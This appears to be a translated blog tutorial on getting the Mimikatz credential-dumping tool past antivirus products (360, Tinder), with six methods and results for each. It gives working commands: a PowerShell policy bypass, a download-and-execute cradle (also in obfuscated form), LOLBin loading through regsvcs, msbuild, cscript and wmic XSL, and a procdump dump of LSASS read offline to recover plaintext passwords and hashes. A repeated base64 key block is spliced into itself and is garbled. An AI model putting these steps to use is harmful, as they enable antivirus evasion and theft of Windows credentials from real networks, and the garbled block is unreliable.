Mimikatz is an artifact that can obtain memory from the Windows Authentication (LSASS) process, and obtain plaintext passwords and NTLM hashes. Mimikatz is commonly used in intranet penetration to obtain plaintext passwords or hash values to roam the intranet. However, in actual application, we often encounter the interception of killing soft, so here I refer to the information on the Internet to conduct recurring learning to achieve the purpose of avoiding killing bypass. Some methods have not been reproduced without success. I have not written them out, and some methods seem to be blocked afterwards.
Table of Contents
Posture 1: powershell
https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1Executed under cmd, 360 without interception
powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"
powershell operation will be blocked
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.30.139/Invoke-Mimikatz.ps1');Invoke-MimikatzSimple confusion is still blocked
powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.30'+'.139/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
Posture 2: Use .net2.0 to avoid mimikatz
First download katz.cs and place it in the Framework directory of the corresponding system version
32位:C:\Windows\Microsoft.NET\Framework\v2.0.50727 64位:C:\Windows\Microsoft.NET\Framework64\v2.0.50727Then execute the command in powershell to generate key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $Content = [System.Convert]::FromBase64String($key) Set-Content key.snk -Value $Content -Encoding BytevW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4 + RhbdWHp99y8QhwRllOC0qu / WxZaffHS2te / PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t + vyvZuHNmAy3pX0BDXqwEfoZZ + hiIk1YUDSNOE79zwnpVP1 + BN0PK5QCPCS + 6zujfRlQpJ + nfHLLicweJ9uT7OG3g / P + JpXGN0 / + Hitolufo7Ucjh + WvZAU // dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5 + o8OhujBHDm / ZQ0361mVsSVWrmgDPKHGGRx + 7FbdgpBEq3m15 / 4zzg343V9NBwt1 + qZU + TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX /$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $Content = [System.Convert]::FromBase64String($key) Set-Content key.snk -Value $Content -Encoding Bytez6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4 = '$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $Content = [System.Convert]::FromBase64String($key) Set-Content key.snk -Value $Content -Encoding Byte
Finally generate mimikatz, then run
32-bit:
C:\Windows\Microsoft.NET\Framework\v2.0.50727>.\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs C:\Windows\Microsoft.NET\Framework\v2.0.50727>.\regsvcs.exe katz.exe64-bit:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727>.\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs C:\Windows\Microsoft.NET\Framework64\v2.0.50727>.\regsvcs.exe katz.exe
Unfortunately, it was discovered by 360 again
However, Tinder passed again without a hint
Posture 3: js loading mimikatz
Download katz.js and execute
cscript mimikatz.js
360 interception, but Tinder passed, no response
Posture four: .net4.0 loading mimikatz
Download mimikatz.xml and execute
cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 msbuild.exe mimikatz.xml
Over 360 and no interception
Tinder also failed to report
Posture five: Xsl version of Jscript
Download mimikatz.xsl
Load locally
wmic os get /format:"mimikatz.xsl"
360, Tinder did not intercept
Posture six: export the lsass process to read the password offline
mimikatz + procdump
Download prodump , run with administrator privileges
procdump64.exe -accepteula -ma lsass.exe 1.dmp
You can also export files in Task Manager
Then export the dmp file locally to read the password using mimikatz
mz64.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit
It should be noted here that the password capture method under win10 is not the same, specifically see another article: Windows10 clear text password capture.
After getting the dmp file under win7, you can directly export and read the plaintext password.
